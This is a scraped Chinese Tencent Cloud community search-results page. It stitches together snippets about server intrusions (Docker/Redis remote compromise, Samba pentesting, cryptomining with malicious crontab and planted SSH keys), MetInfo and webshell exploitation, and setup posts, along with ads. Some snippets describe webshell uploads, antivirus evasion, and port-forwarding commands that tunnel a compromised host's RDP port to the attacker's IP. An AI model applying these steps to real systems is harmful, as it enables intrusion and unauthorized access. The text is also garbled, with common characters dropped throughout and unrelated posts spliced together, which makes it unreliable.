展开

关键词

黑客,入侵

前言 前两天刚买了个腾讯(CVM),这登陆上去的时候特别卡,通过top发现负载特别高,因为是刚搭建的环境,也没有运行什么应用程序,所以我觉得这有点不正常。 后来发现是docker远程入侵,所以就利用docker远程和redis,模拟入侵了自己的。 先求助了波客,客说是被入侵了,让我重装系统。在重装前,又求助了我爱的大学舍友,安全大佬:冯胖,不!是冯佬。 对于这种可以直接登录进行操作的还是第遇见,所以我就拿自己的实验下,反正会儿都要重装系统了。 ,遇到还是很新奇的,所以通过文章记录了下此经历,也当做颇为有趣的体验。

67674

Samba 渗透

其中 139 和 445 上运行的是 Samba ,说明目标机可能是个 SMB 。10123 口上是个 Python 搭建的 HTTP 。 SMB(消息块)是种协议,它允许同网络上的资源共享文件,浏览网络并通过网络进行打印。它最初用于Windows,但是Unix系统可以通过Samba使用SMB。 通常,上有SMB共享驱动,可以连接到该驱动并用于查看或传输文件。对于想要发现敏感信息的攻击者来说,SMB通常可以是个很好的起点,你会惊讶地发现这些共享中有时包含什么。 在极少数情况下,例如当SMB共享目录和Web根目录相同时,攻击者甚至可能利用这种错误配置来实现代码执行。 首先访问 80 口的 Web : ? Smbclient 是种用于访问上 SMB 资源的工具,就像 FTP 客户端用于访问文件样。它提供了个简单的命令行界面,如果您完全熟悉FTP的话,可以轻松使用。

34730
  • 广告
    关闭

    腾讯云+社区系列公开课上线啦!

    Vite学习指南,基于腾讯云Webify部署项目。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    ,腾讯云微产品打包带

    新春采购节 新春钜惠,爆款秒杀;企业用户专属,高配高性价比,助力企业轻松上云,腾讯云微新春大促重磅来袭! 不限新老用户 腾讯微平台 TSF、消息队列 CKafka 最低 4 折优惠 最高可省 30000+ 元! 更有爆款秒杀、代金券大礼包限量放送 点击【在看】先到先得! ? 往期 推荐 《天,把 Pulsar 客户端的性能提升3倍+!》 《超有料!万字详解腾讯微平台 TSF 的敏捷开发流程》 《火速围观!鹅厂中间件产品遭遇暴风吐槽!》 ? 扫描下方二维码关注本公众号, 了解更多微、消息队列的相关信息! 解锁超多鹅厂周边! ? ? 戳原文,了解更多 新春采购节 活动信息 ? 点亮在看,你最好看

    17110

    记录下第

    只是想记录下第买云,哈哈。其实也是临时起意,想着买个以后也能够搭建自己的博客玩玩。 其实大家熟知的云无非就是阿里云和腾讯云。我也是随便选的,选了腾讯云的轻量应用。 因为我也第买,所以我选择的是 Windows 2019,瞅瞅长什么样子。 第登录需要密码,我就纳闷,我不是没设置密码嘛,怎么会要密码呢? 找半天也没找到密码,最后发现可以改密码: 1. 来到轻量应用控制台,点击管理。 2. 然后通过我们的新密码,就可以进入主页了。 其实就跟我们平时使用的电脑没什么区别,但是他可以直不用关机呀,这样我们开发的项目放在上面,他就可以永远直运行下去了。 单击确定,就可以看到我们的windows桌面啦 这样我们就拥有自己的啦,就可以在上面搞事情了。例如做小程序端、个人博客等等好玩的东西。 配置信息 接下来看看其配置信息。 1.

    15820

    黑客,入侵自己的

    前言 前两天刚买了个腾讯(CVM),这登陆上去的时候特别卡,通过top发现负载特别高,因为是刚搭建的环境,也没有运行什么应用程序,所以我觉得这有点不正常。 后来发现是docker远程入侵,所以就利用docker远程和redis,模拟入侵了自己的。 先求助了波客,客说是被入侵了,让我重装系统。在重装前,又求助了我爱的大学舍友,安全大佬:冯胖,不!是冯佬。 问题分析 我:冯啊,我这个systemctl不能用了,咋回事啊? 冯:那就对了,通过docker远程入侵了你的, 然后在利用masscan扫描其他的docker远程,然后进行入侵。 对于这种可以直接登录进行操作的还是第遇见,所以我就拿自己的实验下,反正会儿都要重装系统了。

    7110

    反思Exchange运维故障

    因为邮件是企业核心,加之已经有同事反馈遇到问题,因此此故障应该是重要紧急故障,必须尽快排除以恢复。 其应该检查系统日志。关于先检查日志还是先检查负载情况,只是习惯问题。系统日志般会给与管理员足够的信息。 以下摘录Microsoft文档库--     反压是存在于 Microsoft Exchange Server 2010 集线传输和边缘传输上的 Microsoft Exchange 传输种系统资源监视功能 从这事故来看,此Exchange中含有三个数据库,其中个数据库存放在C盘没有在其他盘。随着时间的增长,这个数据库占用了大量的磁盘空间,导致磁盘空间不足,从而触发了“反压”机制。 此是配置了Zabbix监控报警的,而且Zabbix已经监测到故障并发送报警,由于没有及时的处理才导致本故障的发生。 就算是接盘也要痛改前非。

    83130

    【腾讯云】记搭建云

    1、购买云 个人用的云般要么选择阿里云或腾讯云的,至于选择哪个,个人用的就没什么所谓啦,哪个便宜买哪个。 由于我是第购买,对比了阿里跟腾讯,腾讯的优惠力度比较大,所以就选择了腾讯云,3年288元,当然是最低配置的2G+50G,CentOS。 2.1、docker知识准备 以下摘自百度百科: Docker 是个开源的应用容引擎,让开发者可以打包他们的应用以及依赖包到个可移植的容中,然后发布到任何流行的Linux机或Windows document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; } } 3、总结 以上就是搭建云的过程了 现在只是暂时搭建了云,然后自己预留个坑,搭建博客。

    1.9K453307

    被挖矿的经历

    昨天,领导忽然发来条消息,说是 CPU 直处在 100%,也就是说 CPU 直在处于疯狂的运作,吓得我赶紧起床检查。 今天就记录下,就当回顾 首先,我登录到 阿里云控制台,查看了下,果真 CPU 100%,接着我 ssh 到,使用 top -c ,查看了下有个用户 deployer ,他直处于 100%,然后 以下是我用到的两条命令: top -c kill -9 进程ID 虽然将该进程杀死,解决了,但是我还是害怕他会再启动,索性我把这个用户删掉得了 我们知道删除个用户的命令是 sudo userdel currently used by process 18215 所以这种情况下,使用上述命令是删不掉的,采用如下命令 sudo vipw #找到有关deployer 这条数据 `dd` 掉,也就是说按两 `d`,之后保存退出 `:wq` 接着 sudo vipw - s #同样找到有关deployer 这条数据 `dd` 掉,也就是说按两 `d`,之后保存退出 `:wq` 这样就可以将该用户删除了

    1.1K20

    白瞟攻略,这定!

    恰逢双11即将到来,最近有不少同学在后台问说:有没有办法弄个便宜点的云(云主机)玩玩。 都可以方便地在云上完成。 ---- 恰好今年我也是阿里云的推广大使,从阿里的朋友丙少那里拿到了波福利,所以今年双11在咱这里,我们也可以免费弄个玩玩。 规则非常简单: 这活动正式开始时间是11月1号,如果你是阿里云的新用户,并且通过我的链接注册并购买了,我会直接给买了的小伙伴返现60。 因为活动期间,有是60/年,这样就相当于免费弄了。 要参与的小伙伴(确定需要买,并且符合三个规则之),可以提前加入咱们的群 群里我会给链接,大家提前注册并实名认证,这就锁定了名额!

    15240

    开Minecraft经验总结

    01 – 在本地配置 在租用之前,得先把基本功做好。我们使用的是Fabric/Carpet端,所以,在本地构造端就尤为重要。 02 – 租用 我们选择的是腾讯云的CVM。对于个3-5人的Minecraft,使用1核2G内存1Mbps的是十分充足的。 (如果你保存了配置,下) 屏幕截图 2021-07-15 132656.jpg 界面大概是这个样子的(红色涂掉的是我的个人信息,各位也定要记得保护好自己的IP地址以及的公网IP! 假如你因为断网或者认为操作,导致PuTTY与断开连接,你会发现你的Minecrafft没办法停下来!所以,安装个screen是很重要的。 第二个是vsftpd,方便你上传文件到。 在这个窗口找到你的的文件夹: cd /home/minecraft 然后启动,这样,就大功告成了,使用Minecraft连接进你的吧!

    48440

    运气拿下某校

    2、选择个搭建metinfo可以ping通的机,并在该机上进行监听(kail进行监听) ? ? 3、在burp中构造如下请求: ? ? 坑点(太坑了,搞了大半天,呜呜呜) 因为环境是本地搭建的,和当时实战的环境有很大的区别,所以要上传个png的图片马 且要求: 1、只带有png的标志位的 小tip:将文件后缀改为txt,然后在加上句话木马 2、进行监听 新增个监听 ? 下载之后上传,发现会被360给杀掉,所以想着免杀 免杀,上传,执行,上线 1、免杀生成 ? 2、接着在文件列表中找到相应的文件下载 ? 内网穿透,利用密码登录(端口映射:将3389端口映射到本地,使其可以直接远程连接) 1、将端口映射工具上传到网站上 2、首先在上建立监听,等待连接 ok.exe -listen 6661 3624 3、开始在菜刀上执行映射命令 ok.exe -remote 自己ip 3624 127.0.0.1 3389 4、在自己上远程桌面连接 127.0.0.1:6666 输入上面获得的账号密码即可

    22820

    Linux被入侵变矿机

    0x00 背景 周早上刚到办公室,就听到同事说有登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。 不会运维的同事也到了,气喘吁吁的说:我们有台被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了下,被拒绝了,问了下默认的22端口被封了。 看起来像是个很正经的程序嘛,但仔细再看看上的进程后面还跟着个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。 对,计划任。 crontab -e 12 crontab -e ? 果然,线索找到了。 0x02 作案动机 上面的计划任的意思就是每15分钟去上下载个脚本,并且执行这个脚本。 : 首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每黑客登录这台就可以免密码登录了,执行脚本就会方便很多

    1.4K60

    执行MySQL耗时问题

    墨墨导读:本篇记录执行MySQL耗时的问题,耗时的问题在于句SQL执行,耗时超过1000ms,如何解决这个问题?通过这篇文章了解下。 大概过程 ---- 在测试环境Docker容中,在跨进程调用的时候,A应用通过Dubbo调用B应用的RPC接口,发现B应用接口超时错误,接着通过debug和日志,发现具体耗时的地方在于句简单SQL 通过查看数据库的进程列表,发现是有死锁锁表了,很多进程状态status处于'sending data',最后为锁住的表添加索引,并且kill掉阻塞的请求,解除死锁,速度恢复正常。 下面记录的是大致排查过程: 通过观察业代码,确认没有内存溢出或者其它事问题,于是只能考虑Docker环境的数据库和jvm底层详情了。 在SQL监控Tab中,可以看到执行SQL的具体情况,包括某条SQL语句执行的时间(平均、最慢)、SQL执行数、SQL执行出错的数等 上面显示的是正常情况下,时间单位是ms,正常的SQL般在10ms

    41630

    执行MySQL耗时问题

    导读:本篇记录执行MySQL耗时的问题,耗时的问题在于句SQL执行,耗时超过1000ms,如何解决这个问题?通过这篇文章了解下。 大概过程 ---- 在测试环境Docker容中,在跨进程调用的时候,A应用通过Dubbo调用B应用的RPC接口,发现B应用接口超时错误,接着通过debug和日志,发现具体耗时的地方在于句简单SQL 通过查看数据库的进程列表,发现是有死锁锁表了,很多进程状态status处于'sending data',最后为锁住的表添加索引,并且kill掉阻塞的请求,解除死锁,速度恢复正常。 下面记录的是大致排查过程: 通过观察业代码,确认没有内存溢出或者其它事问题,于是只能考虑Docker环境的数据库和jvm底层详情了。 在SQL监控Tab中,可以看到执行SQL的具体情况,包括某条SQL语句执行的时间(平均、最慢)、SQL执行数、SQL执行出错的数等 上面显示的是正常情况下,时间单位是ms,正常的SQL般在10ms

    44330

    执行MySQL耗时问题

    原文:http://www.enmotech.com/web/detail/1/702/1.html (复制链接,打开浏览即可查看) 大概过程 ---- 在测试环境Docker容中,在跨进程调用的时候 通过查看数据库的进程列表,发现是有死锁锁表了,很多进程状态status处于'sending data',最后为锁住的表添加索引,并且kill掉阻塞的请求,解除死锁,速度恢复正常。 下面记录的是大致排查过程: 通过观察业代码,确认没有内存溢出或者其它事问题,于是只能考虑Docker环境的数据库和jvm底层详情了。 在SQL监控Tab中,可以看到执行SQL的具体情况,包括某条SQL语句执行的时间(平均、最慢)、SQL执行数、SQL执行出错的数等 上面显示的是正常情况下,时间单位是ms,正常的SQL般在10ms 小结 ---- 下遇到MySQL执行耗时的情况,排除了代码问题之后,要去看数据库是否有死锁的情况存在,观察有没有被阻塞的线程,排查被阻塞的线程具体info,定位到具体问题。

    45620

    对认证的渗透测试

    1.2 测试范围 系统名称 目标认证 测试地址 10.*.*.111 测试时间 2018-7-22~2018-7-24 说明 本测试的源访问 ip 对应上网账号可能为 “1522140217 Python Exploit 自行编写的漏洞利用脚本 FireFox 火狐浏览 2.2 测试步骤 2.2.1 预扫描 通过端口扫描或主机查看,确定主机所开放的。 来检查是否有非正常的程序在运行。 ***************************************************************- -----' hostname=raw_input('请输入自助系统域名或 =header) response = conn.getresponse() res= response.read() print 'Response:'+res 2.3.1.2 源代码泄露 在内发现

    1.5K20

    匈牙利提权案例

    #漏洞复现 #工具使用 #权限提升#权限维持 #防护绕过 #内网安全 #实战案例#其他笔记 #资源分享 #MSF 0x01 前言 这个案例记录的是笔者2013年测试的 基本信息探测: 目标站点:http://www.forras**aldorf.hu IP:1*5.2*8.*6.1*4(匈牙利) 环境平台:PHP/5.2.5 系统:Apache/2.2.8 (Win32)  0x02 实战提权过程 打开Webshell后我们先搜集的基本信息,看下是否有可直接利用的溢出漏洞和第三方提权软件,根据自己的个人提权习惯来测试吧。 既然这条路行不通,那我们就换条思路,既然都已经nt authority\system权限了,那就尝试下直接读取/破解NTLM-HASH登录目标系统。 这台大概测试了个多小时才提下,被那个管理组整的我蛋疼,不知道还有没有其它方法能加进管理组。如果是system权限,我们还可以利用远控生成个木马,然后在Webshell上直接运行即可。

    19210

    相关产品

    • 云服务器

      云服务器

      云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。 腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券